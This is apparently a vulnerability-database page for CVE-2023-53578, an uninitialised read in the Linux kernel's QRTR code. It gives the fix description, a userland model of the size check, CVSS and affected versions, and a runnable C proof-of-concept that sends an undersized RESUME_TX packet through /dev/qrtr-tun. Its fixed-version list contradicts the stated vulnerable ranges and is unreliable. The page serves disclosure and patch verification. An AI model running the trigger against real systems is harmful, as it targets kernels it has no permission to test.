Security Vulnerability Report
CVE-2023-53578 CVSS 7.8 HIGH

CVE-2023-53578

Published: 2025-10-04 16:15:53
Last Modified: 2026-03-23 18:30:43
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

net: qrtr: Fix an uninit variable access bug in qrtr_tx_resume()

Syzbot reported a bug as following:

=====================================================
BUG: KMSAN: uninit-value in qrtr_tx_resume+0x185/0x1f0 net/qrtr/af_qrtr.c:230
 qrtr_tx_resume+0x185/0x1f0 net/qrtr/af_qrtr.c:230
 qrtr_endpoint_post+0xf85/0x11b0 net/qrtr/af_qrtr.c:519
 qrtr_tun_write_iter+0x270/0x400 net/qrtr/tun.c:108
 call_write_iter include/linux/fs.h:2189 [inline]
 aio_write+0x63a/0x950 fs/aio.c:1600
 io_submit_one+0x1d1c/0x3bf0 fs/aio.c:2019
 __do_sys_io_submit fs/aio.c:2078 [inline]
 __se_sys_io_submit+0x293/0x770 fs/aio.c:2048
 __x64_sys_io_submit+0x92/0xd0 fs/aio.c:2048
 do_syscall_x64 arch/x86/entry/common.c:50 [inline]
 do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80
 entry_SYSCALL_64_after_hwframe+0x63/0xcd

Uninit was created at:
 slab_post_alloc_hook mm/slab.h:766 [inline]
 slab_alloc_node mm/slub.c:3452 [inline]
 __kmem_cache_alloc_node+0x71f/0xce0 mm/slub.c:3491
 __do_kmalloc_node mm/slab_common.c:967 [inline]
 __kmalloc_node_track_caller+0x114/0x3b0 mm/slab_common.c:988
 kmalloc_reserve net/core/skbuff.c:492 [inline]
 __alloc_skb+0x3af/0x8f0 net/core/skbuff.c:565
 __netdev_alloc_skb+0x120/0x7d0 net/core/skbuff.c:630
 qrtr_endpoint_post+0xbd/0x11b0 net/qrtr/af_qrtr.c:446
 qrtr_tun_write_iter+0x270/0x400 net/qrtr/tun.c:108
 call_write_iter include/linux/fs.h:2189 [inline]
 aio_write+0x63a/0x950 fs/aio.c:1600
 io_submit_one+0x1d1c/0x3bf0 fs/aio.c:2019
 __do_sys_io_submit fs/aio.c:2078 [inline]
 __se_sys_io_submit+0x293/0x770 fs/aio.c:2048
 __x64_sys_io_submit+0x92/0xd0 fs/aio.c:2048
 do_syscall_x64 arch/x86/entry/common.c:50 [inline]
 do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80
 entry_SYSCALL_64_after_hwframe+0x63/0xcd

It is because that skb->len requires at least sizeof(struct qrtr_ctrl_pkt)
in qrtr_tx_resume(). And skb->len equals to size in qrtr_endpoint_post().
But size is less than sizeof(struct qrtr_ctrl_pkt) when qrtr_cb->type
equals to QRTR_TYPE_RESUME_TX in qrtr_endpoint_post() under the syzbot
scenario. This triggers the uninit variable access bug.

Add size check when qrtr_cb->type equals to QRTR_TYPE_RESUME_TX in
qrtr_endpoint_post() to fix the bug.
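To make the fix concrete, below is an added userland model of the length validation that qrtr_endpoint_post() performs before handing a packet to qrtr_tx_resume(). It is example code written for this page, not kernel code and not part of the advisory. The header layouts (32-byte qrtr_hdr_v1, 24-byte qrtr_hdr_v2), the type values (QRTR_TYPE_NEW_SERVER = 4, QRTR_TYPE_RESUME_TX = 7) and the 20-byte sizeof(struct qrtr_ctrl_pkt) are taken from net/qrtr/qrtr.h and include/uapi/linux/qrtr.h as I know them; the function names and the constructed packets are my own. The `fixed` flag switches between the pre-patch check (only QRTR_TYPE_NEW_SERVER bounded) and the post-patch check (QRTR_TYPE_RESUME_TX bounded too), which is exactly the one-condition change the commit message describes.

```c
/* Added example: userland model of the validation in qrtr_endpoint_post()
 * (net/qrtr/af_qrtr.c), with and without the CVE-2023-53578 size check.
 * Not kernel code; constants mirror net/qrtr/qrtr.h and uapi/linux/qrtr.h. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define QRTR_PROTO_VER_1     1
#define QRTR_PROTO_VER_2     3
#define QRTR_TYPE_DATA       1
#define QRTR_TYPE_NEW_SERVER 4
#define QRTR_TYPE_RESUME_TX  7
#define QRTR_HDR_V1_LEN      32  /* sizeof(struct qrtr_hdr_v1): 8 x __le32 */
#define QRTR_HDR_V2_LEN      24  /* sizeof(struct qrtr_hdr_v2): 4 x u8 + 5 x __le32 */
#define QRTR_CTRL_PKT_SIZE   20  /* sizeof(struct qrtr_ctrl_pkt): __le32 cmd + 4 x __le32 */
#define ALIGN4(x)            (((size_t)(x) + 3) & ~(size_t)3)

enum verdict {
	ACCEPT = 0,        /* payload is copied into the skb and dispatched */
	REJECT_LEN,        /* len == 0, len % 4 != 0, or shorter than the header */
	REJECT_VERSION,    /* first byte is neither QRTR_PROTO_VER_1 nor _2 */
	REJECT_SIZE,       /* size == 0 or len != ALIGN(size, 4) + hdrlen */
	REJECT_CTRL_SHORT  /* control packet shorter than struct qrtr_ctrl_pkt */
};

static uint32_t get_le32(const uint8_t *p)
{
	return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void put_le32(uint8_t *p, uint32_t v)
{
	p[0] = v; p[1] = v >> 8; p[2] = v >> 16; p[3] = v >> 24;
}

/* Checks qrtr_endpoint_post() applies before dispatch. 'fixed' selects whether
 * the minimum-size check covers QRTR_TYPE_RESUME_TX as well as NEW_SERVER
 * (patched) or NEW_SERVER alone (vulnerable). */
enum verdict qrtr_validate(const uint8_t *data, size_t len, bool fixed)
{
	uint32_t type, size;
	size_t hdrlen;

	if (len == 0 || (len & 3))
		return REJECT_LEN;

	switch (data[0]) {
	case QRTR_PROTO_VER_1:
		if (len < QRTR_HDR_V1_LEN)
			return REJECT_LEN;
		hdrlen = QRTR_HDR_V1_LEN;
		type = get_le32(data + 4);           /* qrtr_hdr_v1.type */
		size = get_le32(data + 20);          /* qrtr_hdr_v1.size */
		break;
	case QRTR_PROTO_VER_2:
		if (len < QRTR_HDR_V2_LEN)
			return REJECT_LEN;
		hdrlen = QRTR_HDR_V2_LEN + data[3];  /* qrtr_hdr_v2.optlen */
		type = data[1];                      /* qrtr_hdr_v2.type */
		size = get_le32(data + 4);           /* qrtr_hdr_v2.size */
		break;
	default:
		return REJECT_VERSION;
	}

	if (size == 0 || len != ALIGN4(size) + hdrlen)
		return REJECT_SIZE;

	/* Pre-patch only NEW_SERVER was bounded, although RESUME_TX is also parsed as
	 * struct qrtr_ctrl_pkt (client.node at payload offset 4, client.port at 8). */
	if (type == QRTR_TYPE_NEW_SERVER && size < QRTR_CTRL_PKT_SIZE)
		return REJECT_CTRL_SHORT;
	if (fixed && type == QRTR_TYPE_RESUME_TX && size < QRTR_CTRL_PKT_SIZE)
		return REJECT_CTRL_SHORT;
	return ACCEPT;
}

/* Bytes of pkt->client.{node,port} (payload offsets 4..12) that the vulnerable
 * qrtr_tx_resume() reads beyond the 'size' payload bytes actually stored. */
size_t uninit_bytes_read(uint32_t size)
{
	if (size >= 12)
		return 0;
	return size <= 4 ? 8 : 12 - size;
}

/* Build a v1 packet of 'type' with an all-zero payload of 'size' bytes into
 * buf (capacity cap); returns total length, or 0 if it does not fit. */
size_t build_v1(uint8_t *buf, size_t cap, uint32_t type, uint32_t size)
{
	size_t total = QRTR_HDR_V1_LEN + ALIGN4(size);

	if (total > cap)
		return 0;
	memset(buf, 0, total);
	put_le32(buf + 0, QRTR_PROTO_VER_1);
	put_le32(buf + 4, type);
	put_le32(buf + 20, size);
	return total;
}

/* Build and validate a v1 packet in one step (what the qrtr-tun write path sees). */
enum verdict check_v1(uint32_t type, uint32_t size, bool fixed)
{
	uint8_t buf[128];
	size_t len = build_v1(buf, sizeof(buf), type, size);

	return len ? qrtr_validate(buf, len, fixed) : REJECT_LEN;
}

int main(void)
{
	static const char *names[] = { "ACCEPT", "REJECT_LEN", "REJECT_VERSION",
				       "REJECT_SIZE", "REJECT_CTRL_SHORT" };

	printf("RESUME_TX payload size / vulnerable / patched / uninit bytes read\n");
	for (uint32_t size = 4; size <= 20; size += 4)
		printf("%2u  %-17s  %-17s  %zu\n", size,
		       names[check_v1(QRTR_TYPE_RESUME_TX, size, false)],
		       names[check_v1(QRTR_TYPE_RESUME_TX, size, true)],
		       uninit_bytes_read(size));
	return 0;
}
```

The table the program prints is the whole story of the bug: a 36-byte v1 packet (32-byte header, size = 4) satisfies the length and alignment checks on both kernels, but only the patched validator stops it before qrtr_tx_resume() reads eight bytes of client.node/client.port that were never written into the skb.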

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (from 5.6, up to but excluding 5.10.178)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (from 5.11, up to but excluding 5.15.108)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (from 5.16, up to but excluding 6.1.25)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (from 6.2, up to but excluding 6.2.12)
cpe:2.3:o:linux:linux_kernel:6.3:rc1:*:*:*:*:*:* - VULNERABLE (likewise 6.3 rc2 through rc6)
Linux Kernel < 6.6 (fixed by commit bef57c227b52)
Linux Kernel < 6.1 (fixed by commit c6a796ee5a639)
Linux Kernel < 5.15 (fixed by commit 8c9ce34a6ff2)
Linux Kernel < 5.10 (fixed by commit 6417070918de)
Linux Kernel < 5.4 (fixed by commit 3814d211ff13)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2023-53578 PoC - Linux Kernel QRTR Uninit Variable Access
// This PoC triggers the uninitialized variable access bug in qrtr_tx_resume()
// by sending a QRTR_TYPE_RESUME_TX control packet whose payload is smaller
// than sizeof(struct qrtr_ctrl_pkt).
//
// Requirements: CONFIG_QRTR_TUN and write access to /dev/qrtr-tun (normally
// root only). On a vulnerable kernel the write is accepted and returns the
// packet length (with KMSAN enabled a report lands in dmesg; without it the
// bad read is silent). On a patched kernel the size check added to
// qrtr_endpoint_post() rejects the packet and the write fails with EINVAL.
#define _GNU_SOURCE
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/aio_abi.h>

#define QRTR_TUN_DEV        "/dev/qrtr-tun"
#define QRTR_PROTO_VER_1    1   // version byte selecting struct qrtr_hdr_v1 (net/qrtr/qrtr.h)
#define QRTR_TYPE_RESUME_TX 7   // enum qrtr_pkt_type in net/qrtr/qrtr.h
#define QRTR_CTRL_PKT_SIZE  20  // sizeof(struct qrtr_ctrl_pkt): __le32 cmd + 4 x __le32, packed
#define PAYLOAD_SIZE        4   // Intentionally smaller than QRTR_CTRL_PKT_SIZE

// Version-1 QRTR wire header (32 bytes, little-endian) as parsed by qrtr_endpoint_post()
struct qrtr_hdr_v1 {
	uint32_t version;
	uint32_t type;
	uint32_t src_node_id;
	uint32_t src_port_id;
	uint32_t confirm_rx;
	uint32_t size;
	uint32_t dst_node_id;
	uint32_t dst_port_id;
} __attribute__((packed));

// Header plus undersized payload. qrtr_endpoint_post() only checks that
// len == ALIGN(size, 4) + hdrlen and len % 4 == 0; 32 + 4 = 36 passes, but
// size (4) is below sizeof(struct qrtr_ctrl_pkt), so qrtr_tx_resume() reads
// pkt->client.node and pkt->client.port (payload offsets 4..12) from skb
// memory the sender never filled in.
struct resume_tx_pkt {
	struct qrtr_hdr_v1 hdr;
	uint8_t payload[PAYLOAD_SIZE];
} __attribute__((packed));

static void build_packet(struct resume_tx_pkt *pkt)
{
	memset(pkt, 0, sizeof(*pkt));
	pkt->hdr.version = htole32(QRTR_PROTO_VER_1);
	pkt->hdr.type = htole32(QRTR_TYPE_RESUME_TX);  // Route into qrtr_tx_resume()
	pkt->hdr.size = htole32(PAYLOAD_SIZE);         // Less than sizeof(struct qrtr_ctrl_pkt)
}

static void report(ssize_t ret, int err)
{
	if (ret < 0 && err == EINVAL)
		printf("write rejected (EINVAL): kernel appears to have the size check\n");
	else if (ret < 0)
		printf("write failed: %s\n", strerror(err));
	else
		printf("write accepted (%zd bytes): undersized RESUME_TX reached "
		       "qrtr_tx_resume(), check dmesg for a KMSAN report\n", ret);
}

// Trigger the vulnerability via a plain write() to the qrtr tunnel
int trigger_vuln(void)
{
	struct resume_tx_pkt pkt;
	ssize_t ret;
	int fd;

	fd = open(QRTR_TUN_DEV, O_WRONLY);
	if (fd < 0) {
		perror("open qrtr-tun");
		return -1;
	}

	build_packet(&pkt);
	// write -> qrtr_tun_write_iter -> qrtr_endpoint_post -> qrtr_tx_resume (BUG)
	ret = write(fd, &pkt, sizeof(pkt));
	report(ret, errno);
	close(fd);
	return ret < 0 ? -1 : 0;
}

// Alternative: use io_submit (the path in the syzbot trace) for an async trigger
int trigger_vuln_async(void)
{
	struct resume_tx_pkt pkt;
	struct iocb cb;
	struct iocb *cbs[1] = { &cb };
	struct io_event ev;
	aio_context_t ioctx = 0;
	int fd, ret = -1;

	// Setup AIO context
	if (syscall(SYS_io_setup, 1, &ioctx) < 0) {
		perror("io_setup");
		return -1;
	}

	fd = open(QRTR_TUN_DEV, O_WRONLY);
	if (fd < 0) {
		perror("open qrtr-tun");
		goto out_ctx;
	}

	build_packet(&pkt);

	// Prepare async I/O control block
	memset(&cb, 0, sizeof(cb));
	cb.aio_fildes = fd;
	cb.aio_lio_opcode = IOCB_CMD_PWRITE;
	cb.aio_buf = (uint64_t)(uintptr_t)&pkt;
	cb.aio_nbytes = sizeof(pkt);
	cb.aio_offset = 0;

	// Submit async write - triggers the vulnerable code path
	// Call trace: io_submit -> aio_write -> qrtr_tun_write_iter ->
	//             qrtr_endpoint_post -> qrtr_tx_resume (BUG)
	if (syscall(SYS_io_submit, ioctx, 1, cbs) != 1) {
		perror("io_submit");
		goto out_fd;
	}
	// The write's result comes back in the completion event, not from io_submit()
	if (syscall(SYS_io_getevents, ioctx, 1, 1, &ev, NULL) != 1) {
		perror("io_getevents");
		goto out_fd;
	}
	report((ssize_t)ev.res, ev.res < 0 ? (int)-ev.res : 0);
	ret = ev.res < 0 ? -1 : 0;
out_fd:
	close(fd);
out_ctx:
	syscall(SYS_io_destroy, ioctx);
	return ret;
}

int main(int argc, char *argv[])
{
	printf("CVE-2023-53578 PoC - Linux Kernel QRTR Uninit Variable Access\n");
	printf("Triggering vulnerability...\n");
	if (argc > 1 && strcmp(argv[1], "async") == 0)
		trigger_vuln_async();
	else
		trigger_vuln();
	printf("Done. Check kernel logs for a KMSAN report.\n");
	return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53578", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:53.483", "lastModified": "2026-03-23T18:30:42.813", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: qrtr: Fix an uninit variable access bug in qrtr_tx_resume()\n\nSyzbot reported a bug as following:\n\n=====================================================\nBUG: KMSAN: uninit-value in qrtr_tx_resume+0x185/0x1f0 net/qrtr/af_qrtr.c:230\n qrtr_tx_resume+0x185/0x1f0 net/qrtr/af_qrtr.c:230\n qrtr_endpoint_post+0xf85/0x11b0 net/qrtr/af_qrtr.c:519\n qrtr_tun_write_iter+0x270/0x400 net/qrtr/tun.c:108\n call_write_iter include/linux/fs.h:2189 [inline]\n aio_write+0x63a/0x950 fs/aio.c:1600\n io_submit_one+0x1d1c/0x3bf0 fs/aio.c:2019\n __do_sys_io_submit fs/aio.c:2078 [inline]\n __se_sys_io_submit+0x293/0x770 fs/aio.c:2048\n __x64_sys_io_submit+0x92/0xd0 fs/aio.c:2048\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nUninit was created at:\n slab_post_alloc_hook mm/slab.h:766 [inline]\n slab_alloc_node mm/slub.c:3452 [inline]\n __kmem_cache_alloc_node+0x71f/0xce0 mm/slub.c:3491\n __do_kmalloc_node mm/slab_common.c:967 [inline]\n __kmalloc_node_track_caller+0x114/0x3b0 mm/slab_common.c:988\n kmalloc_reserve net/core/skbuff.c:492 [inline]\n __alloc_skb+0x3af/0x8f0 net/core/skbuff.c:565\n __netdev_alloc_skb+0x120/0x7d0 net/core/skbuff.c:630\n qrtr_endpoint_post+0xbd/0x11b0 net/qrtr/af_qrtr.c:446\n qrtr_tun_write_iter+0x270/0x400 net/qrtr/tun.c:108\n call_write_iter include/linux/fs.h:2189 [inline]\n aio_write+0x63a/0x950 fs/aio.c:1600\n io_submit_one+0x1d1c/0x3bf0 fs/aio.c:2019\n __do_sys_io_submit fs/aio.c:2078 [inline]\n __se_sys_io_submit+0x293/0x770 fs/aio.c:2048\n __x64_sys_io_submit+0x92/0xd0 fs/aio.c:2048\n do_syscall_x64 
arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nIt is because that skb->len requires at least sizeof(struct qrtr_ctrl_pkt)\nin qrtr_tx_resume(). And skb->len equals to size in qrtr_endpoint_post().\nBut size is less than sizeof(struct qrtr_ctrl_pkt) when qrtr_cb->type\nequals to QRTR_TYPE_RESUME_TX in qrtr_endpoint_post() under the syzbot\nscenario. This triggers the uninit variable access bug.\n\nAdd size check when qrtr_cb->type equals to QRTR_TYPE_RESUME_TX in\nqrtr_endpoint_post() to fix the bug."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-908"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.6", "versionEndExcluding": "5.10.178", "matchCriteriaId": "D24F41C8-D72D-442C-8122-DD0C7229CC1F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.108", "matchCriteriaId": "12E7A5F9-38FA-429F-A165-975A914E6666"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.25", "matchCriteriaId": "A6E5D96B-E06F-4EB1-B0AA-BB8F5E9187E0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "6.2", "versionEndExcluding": "6.2.12", "matchCriteriaId": "4AA01E0B-227C-4686-AC91-BA30BCC48E6D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc1:*:*:*:*:*:*", "matchCriteriaId": "B8E3B0E8-FA27-4305-87BB-AF6C25B160CB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc2:*:*:*:*:*:*", "matchCriteriaId": "A47F0FC3-CE52-4BA1-BA51-22F783938431"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc3:*:*:*:*:*:*", "matchCriteriaId": "3583026A-27EC-4A4C-850A-83F2AF970673"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc4:*:*:*:*:*:*", "matchCriteriaId": "DC271202-7570-4505-89A4-D602D47BFD00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc5:*:*:*:*:*:*", "matchCriteriaId": "D413BB6D-4F74-4C7D-9163-47786619EF53"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc6:*:*:*:*:*:*", "matchCriteriaId": "F4D613FB-9976-4989-8C4A-567773373CEA"}]}]}], "references": [{"url": "https://git.ker ... (truncated)